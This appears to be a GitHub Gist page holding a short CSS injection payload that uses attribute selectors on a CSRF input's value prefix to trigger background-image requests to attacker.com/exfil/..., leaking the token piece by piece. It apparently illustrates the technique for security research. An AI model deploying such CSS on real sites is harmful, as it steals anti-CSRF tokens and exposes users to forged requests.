Last active
July 25, 2018 07:12
-
-
Save d0nutptr/fa0efd99126c6ae6fde10a9694a7237a to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
input[name=csrf][value^=ca]{ | |
background-image: url(https://attacker.com/exfil/ca); | |
} | |
input[name=csrf][value^=cb]{ | |
background-image: url(https://attacker.com/exfil/cb); | |
} | |
/* ... */ | |
input[name=csrf][value^=c9]{ | |
background-image: url(https://attacker.com/exfil/c9); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment